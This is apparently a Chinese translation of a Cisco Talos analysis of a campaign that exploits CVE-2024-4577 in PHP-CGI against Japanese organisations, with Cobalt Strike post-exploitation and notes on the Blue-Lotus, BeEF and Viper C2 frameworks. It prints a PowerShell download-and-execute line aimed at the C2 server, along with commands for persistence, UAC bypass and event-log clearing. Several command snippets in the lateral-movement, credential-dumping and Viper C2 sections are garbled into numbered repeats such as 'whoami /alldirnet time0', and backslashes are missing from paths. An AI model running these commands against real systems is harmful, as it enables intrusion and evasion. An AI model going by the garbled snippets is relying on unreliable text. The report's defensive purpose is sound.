Cisco Talos 发现,自 2025 年 1 月起,一名未知攻击者持续开展恶意活动,主要针对日本的各类组织。 攻击者利用漏洞 CVE-2024-4577 —— 该漏洞为 Windows 平台 PHP-CGI 实现中的远程代码执行(RCE)缺陷 —— 来获取对受害机器的初始访问权限。 攻击者使用了公开发布的 Cobalt Strike 工具包 “TaoWu” 的插件来进行后续利用活动。 Talos 在命令与控制(C2)服务器上发现了一个预配置的安装脚本,该脚本部署了一整套托管在阿里云容器注册中心上的对抗性工具和框架,这突显了攻击者可能滥用这些工具以实施恶意行为的风险。 Talos 还注意到攻击者试图窃取受害机器的凭据。然而,根据我们对其他后利用活动(例如建立持久性、提权至 SYSTEM 权限以及可能访问对抗性框架)的观察,我们中等程度地评估认为攻击者的动机不仅仅限于凭据窃取,未来可能还会发动进一步攻击。 我们在 2024 年 Q4 的 Talos 事件响应(Talos IR)报告 中指出,利用易受攻击的面向公众的应用程序获取初始访问权限的威胁行为呈上升趋势,此次入侵事件再次证明了这一持续的活动趋势。
受害者分析
根据我们对命令与控制(C2)服务器产物的分析,我们发现攻击者主要针对日本各行业的组织,包括科技、通信、娱乐、教育和电子商务领域。
攻击概述
攻击者试图通过利用漏洞 CVE-2024-4577 的漏洞程序来破坏受害机器,该漏洞存在于 Windows 平台 PHP-CGI 的 PHP 实现中。一旦利用成功,攻击者便执行 PowerShell 脚本来运行 Cobalt Strike 的反向 HTTP shellcode,从而确保远程访问受害机器。
随后,攻击者通过收集系统详细信息和用户权限进行侦查。其利用 JuicyPotato、RottenPotato 和 SweetPotato 等提权漏洞程序来获得 SYSTEM 级别的权限。攻击者还通过修改注册表、添加计划任务以及利用 “TaoWu” Cobalt Strike 工具包中的插件创建恶意服务来建立持久性。
为了保持隐蔽性,攻击者使用 wevtutil 命令清除受害机器上的事件日志,从 Windows 安全、系统和应用程序日志中抹去其行为痕迹。他们进一步使用 “fscan.exe” 和 “Seatbelt.exe” 进行网络侦查,绘制潜在横向移动目标的网络地图。攻击者还试图滥用 Group Policy Objects,通过 “SharpGPOAbuse.exe” 执行恶意 PowerShell 脚本在网络内传播。最终,他们执行 Mimikatz 命令来转储并窃取受害机器内存中的密码和 NTLM 哈希。
初始访问
Talos 发现,攻击者通过利用漏洞 CVE-2024-4577 获取受害网络的初始访问权限。
CVE-2024-4577 是 Windows 系统中基于 CGI 配置的 PHP 安装中一个关键的远程代码执行(RCE)漏洞。该漏洞源于 Windows 代码页中的 “最佳匹配” 行为,某些字符在命令行输入中被替换。PHP-CGI 模块中的此缺陷会将这些字符误解为 PHP 选项,从而允许攻击者在使用 Apache 以及易受影响的 PHP-CGI 设置的情况下执行任意 PHP 代码。
为了利用该漏洞,攻击者使用了公开发布的 exploit Python 脚本 “PHP-CGI_CVE-2024-4577_RCE.py”。该脚本通过向目标 URL 发送特制的 POST 请求(其中包含用于触发漏洞的 PHP 代码)来检测 URL 是否易受 CVE-2024-4577 漏洞的影响。如果响应中包含 MD5 哈希 “e10adc3949ba59abbe56e057f20f883e”,则表明利用成功。接着,利用脚本会提示用户输入将作为 PHP 代码执行的命令,并将响应显示给攻击者。
PHP-CGI 漏洞利用脚本的代码片段。
在此次入侵中,我们发现攻击者在 PHP 代码中嵌入了 PowerShell 命令以触发感染。
<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>攻击者通过在 PHP 代码中执行 PowerShell 命令触发感染,从而使受害机器内存中下载并执行来自 C2 服务器的 PowerShell 注入器脚本。
该 PowerShell 注入器脚本中嵌入了 base64 编码或十六进制数据块形式的 Cobalt Strike 反向 HTTP shellcode。执行后,它将 shellcode 注入并执行于受害机器内存中,并通过 HTTP 连接至运行在 C2 服务器上的 Cobalt Strike 服务器,从而实现对受害机器的远程访问。
Cobalt Strike 反向 HTTP shellcode 的代码片段。
该 shellcode 通过 HTTP 使用 8077 端口以及 URL 路径 “/6Qeq” 或 “/jANd” 与 C2 服务器 38[.]14[.]255[.]23 建立连接。攻击者使用以下两种 HTTP 请求头中的其中一个:
Cobalt Strike 反向 HTTP shellcode 的代码片段。
后利用活动
在通过 Cobalt Strike 反向 HTTP shellcode 获得对受害机器的远程访问权限后,攻击者从配置有 “TaoWu” 插件的 Cobalt Strike 服务器上远程执行命令,对受害机器进行后续利用。
以下是我们在此次攻击中观察到并与 MITRE ATT&CK 框架相关的后利用命令。
侦查
ATT&CK 技术:系统所有者/用户发现 (T1033)
攻击者收集受害机器的系统和用户信息,并检查时间同步情况,远程在受害机器上执行以下命令:
whoami /alldirnet time提权
ATT&CK 技术:利用漏洞提权 (T1068)
攻击者尝试通过执行提权漏洞利用程序来提升用户权限,包括 JuicyPotato、RottenPotato 和 SweetPotato。这些 “Potato” 漏洞利用程序滥用了 Windows 在处理身份验证和模拟令牌时的方法,从低权限用户提升到 SYSTEM 用户。
微软已针对 Windows 10、Windows Server 2012、2016 和 2019 以及最新版本修补了这些漏洞。然而,如果 Windows 进程启用了允许模拟其他用户安全令牌的 “SeImpersonatePrivilege” 权限,则仍可能被 JuicyPotato、SweetPotato 和 RottenPotato 利用进行提权。
攻击者使用 “TaoWu” Cobalt Strike 工具包中的 Ladon.exe 插件来绕过受害机器上的用户访问控制。
Ladon.exe BypassUac C:WindowsTemp123.exe持久性
ATT&CK 技术:修改注册表 (T1112)ATT&CK 技术:计划任务/作业 (T1053)ATT&CK 技术:创建或修改系统进程 (T1543)
攻击者利用 “reg add” 命令以及 TaoWu Cobalt Strike 工具包中的其他 .NET 插件修改注册表键值,并创建 Windows 计划任务,从而在受害机器上建立持久性。
攻击者执行 “reg add” 命令,将 beacon 可执行文件的路径添加至 Run 注册表项中:
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Svchost /t REG_SZ /d "C:Windowssystem32cmd.exe" /f C:WindowsTemppayload.exe攻击者运行 “sharpTask.exe”,这是一款用于在 Windows 机器上调度任务的 .NET 程序。
sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30 some Service "Some Service" C:WindowsTemppayload.exe他们运行 “SharpHide.exe”,该工具用于创建隐藏的注册表键值。
SharpHide.exe action=create keyvalue="C:WindowsTemp123.exe"同时,他们运行 “SharpStay.exe”,这是一款用于在 Windows 机器上创建服务的 .NET 工具。
SharpStay.exe action=CreateService servicename=Debug command="C:Windowstmppayload.exe"检测规避
ATT&CK 技术:主机指标移除:清除 Windows 事件日志 (T1070.001)
攻击者通过使用现成的工具(LoLBin) “wevtutil.exe” 清除受害机器上的 Windows 事件日志,从而抹除其活动痕迹。
wevtutil cl securitywevtutil cl systemwevtutil cl applicationwevtutil cl windows powershell横向移动
ATT&CK 技术:横向工具传输 (T1570)
攻击者使用开源网络扫描工具 fscan.exe 和 Seatbelt(一款用于收集受害机器详细信息的工具,如远程访问配置、网络共享以及其他与安全相关的数据)进行网络侦查和横向移动。
攻击者从 C2 服务器上传了工具 “fscan.exe” 到受害机器的 “C:WindowsTemp” 目录下:
upload /"C2 server path"/fscan.exe随后,攻击者运行 .NET 程序 “Seatbelt.exe”,以收集受害机器的远程访问相关信息。
Seatbelt.exe -group=Remote -full攻击者运行 “SharpGPOAbuse.exe”,该工具用于滥用组策略对象 (GPO) 以达到恶意目的。攻击者通过 GPO 创建一个名为 “update” 的计划任务,运行一个 PowerShell 命令在整个网络内下载并执行攻击者的 PowerShell 有效载荷。
whoami /alldirnet time0攻击者运行 “fscan” 扫描受害机器本地子网(256 个 IP 地址范围),以发现其他机器、端口和服务。
whoami /alldirnet time1攻击者定位到支持公钥认证的 SSH 服务,通过提供公钥(id_rsa.pub)自动化进行 SSH 暴力破解,以获取对 SSH 开启机器的未授权访问。同时,他们还针对运行在非默认端口(2222)的 SSH 服务尝试暴力破解 SSH 凭据。
whoami /alldirnet time2利用 fscan 工具,攻击者开启反向 shell,从而执行命令在子网中的受害机器上,并通过连接回其服务器 6666 端口来执行 “whoami” 命令:
whoami /alldirnet time3凭据获取及数据外传
ATT&CK 技术:操作系统凭据转储 (T1003)ATT&CK 技术:操作系统凭据转储:LSASS 内存 (T1003.001)ATT&CK 技术:通过 C2 通道进行数据外传 (T1041)
攻击者执行 Mimikatz 命令,从受害机器内存中提取明文密码和 NTLM 哈希:
whoami /alldirnet time4攻击者作战手法与某黑客组织相似
我们观察到,攻击者通过利用目标系统中的漏洞获取初始访问权限,并执行 Cobalt Strike 反向 HTTP 信标来持续保持对受害机器的远程访问。他们使用了包含多个插件(如 sharpTask.exe、SharpHide.exe、SharpStay.exe、Ladon.exe、fscan 及 Mimikatz)的 Cobalt Strike 工具包 “TaoWu”。
此前有报道称,黑客组织 “Dark Cloud Shield” 或 “You Dun” 在 2024 年的攻击中曾使用类似技术(参见 DFIR Reporthttps://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-dun-threat-group/))。然而,我们并未将此次攻击归因于 “You Dun” 组织,因为在当前入侵中,我们仅观察到在收集受害机器凭据后的活动。
对抗性工具和框架的潜在滥用
我们发现,攻击者使用了两台 C2 服务器,IP 分别为 38[.]14[.]255[.]23 和 118[.]31[.]18[.]77,这些服务器均托管在阿里云上运行 Cobalt Strike 团队服务器。(译注:第一个 ip 不是阿里云的,ip地址归属是美国,他们是怎么判断该 ip是阿里云的?)在我们的研究期间,通过 OSINT 资料显示,攻击者在 C2 服务器 38[.]14[.]255[.]23 上将根目录的目录列表和访问权限暴露在互联网上。
我们在该 C2 服务器暴露的文件夹中发现了 PowerShell 脚本、Cobalt Strike 信标可执行文件以及漏洞利用程序,还有攻击者的命令执行历史日志。进一步分析该文件夹内容后显示,攻击者下载并执行了一个预配置的安装 shell 脚本 “LinuxEnvConfig.sh”,该脚本来自 Gitee 平台上 “yijingsec” 仓库(hxxps[://]gitee[.]com/yijingsec/),该平台类似 GitHub。仓库的作者描述该仓库属于 “xx网络安全学院” —— 一家网络安全人才培训服务提供商,这表明攻击者很可能滥用这一合法资源实施恶意行为。
该 shell 脚本 “LinuxEnvConfig.sh” 似乎旨在为 Ubuntu、Debian 和 Kali Linux 系统配置基础环境,并便于设置包括 Vulfocus、Asset Reconnaissance Lighthouse (ARL)、Viper C2、Starkiller、BeEF 以及 Blue-Lotus 在内的各类公开的攻防安全框架和工具,这些工具均以 Docker 容器形式存放在位于中国上海区域的阿里云容器注册中心 “registry.cn-shanghai.aliyuncs.com” 中。
我们还发现,该 shell 脚本在用户执行后会修改机器的 DNS 设置,指向 IP 为 114[.]114[.]114[.]114 的特定 DNS 服务器,该服务器属于中国的 114DNS 服务,在其他地区使用率较低。
LinuxEnvConfig 菜单驱动界面。
我们持续观察到各类威胁行为者滥用公开工具,如 Cobalt Strike、Metasploit、ARL、Vulfocus 以及 PowerShell Empire 来实施恶意行为,但我们发现某些工具和框架(例如 Blue-Lotus、BeEF 和 Viper C2)并不常见于攻击者手中,针对这些工具我们在博客文章中做了更详细的文档说明,以便概述攻击者滥用这些工具可能获得的能力和功能。
Blue-Lotus
Blue-Lotus 是一个基于 JavaScript 的 Web 后门跨站脚本(XSS)攻击框架。Blue-Lotus 基于 Docker 开发,由 Firesun.me 以及来自清华大学的 Blue Lotus 团队(一个网络安全技术竞赛和研究团队)开发。
Blue-Lotus 的管理面板为中文,其 XSS 接收仪表盘显示受害机器的连接详情,包括 IP 地址和浏览器信息。
Blue-Lotus 工具控制面板。
Blue-Lotus 还提供有效载荷生成面板,用户可以使用工具数据库中的默认 JavaScript 模板生成 Web 后门有效载荷。攻击者利用该框架生成 Web 后门,有助于执行以下任务:
跨站脚本攻击 (XSS)。 远程机器截屏。 获取目标机器的反向 shell 访问权限。 窃取浏览器 Cookie。 在内容管理系统 (CMS) 中创建用户 ID 和密码。
Blue-Lotus 有效载荷生成面板。
BeEF
BeEF 是一个公开发布的浏览器利用框架,攻击者可以利用它对受害机器上的一个或多个浏览器进行挂钩,并在浏览器上下文中执行命令。BeEF 拥有多个命令模块,这些模块由 JavaScript 代码组成,可用于执行以下任务:
检查被hook浏览器中页面的链接、表单和 URI 路径是否存在 XSS 漏洞。 代表被hook浏览器提交任意请求。 与被hook浏览器所在的局域网内的主机进行交互。 通过 Web 实时通信 (WebRTC) 发送命令至受害系统。
BeEF 工具仪表盘。
Viper C2
Viper C2 是一个模块化框架,配有多个插件和脚本,定义了其广泛的功能。该 C2 框架内置与 Metasploit 的 meterpreter 控制台和脚本的集成。
Viper C2 的主要功能包括:
绕过杀软检测。 内网隧道。 远程机器的文件管理,如文件上传和执行其他可执行文件。 对受害主机进行远程命令执行。 为 Windows、Linux 和 MacOS 等多个平台生成 Meterpreter 反向 shell 的有效载荷,且支持多种格式。 展示受害网络的网络拓扑结构。
Viper C2 控制面板。
Viper C2 支持生成适用于 Windows、Linux、MacOS、Android、Java 以及 Python 等多个平台的 Meterpreter HTTP 和 TCP 反向 shell 有效载荷。生成的有效载荷格式多样,例如 EXE、DLL、ELF、ELF-SO、MSBuild、Macho、PowerShell 脚本、PowerShell 命令、Python 脚本以及 HTA 和 VBA 脚本。
Viper C2 有效载荷生成面板。
以下是一些由 Viper C2 生成的命令格式示例,这些示例可协助防御者和威胁猎人针对 Viper C2 相关威胁进行检测:
Windows:
whoami /alldirnet time5Linux:
whoami /alldirnet time6PHP:
whoami /alldirnet time7Python:
whoami /alldirnet time8PowerShell:
whoami /alldirnet time9Linux 下载并执行:
Ladon.exe BypassUac C:WindowsTemp123.exe0威胁指标
有关该威胁的 IOC(威胁指标),请参见我们的 GitHub 仓库此处https://github.com/Cisco-Talos/IOCs/blob/main/2025/02/
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...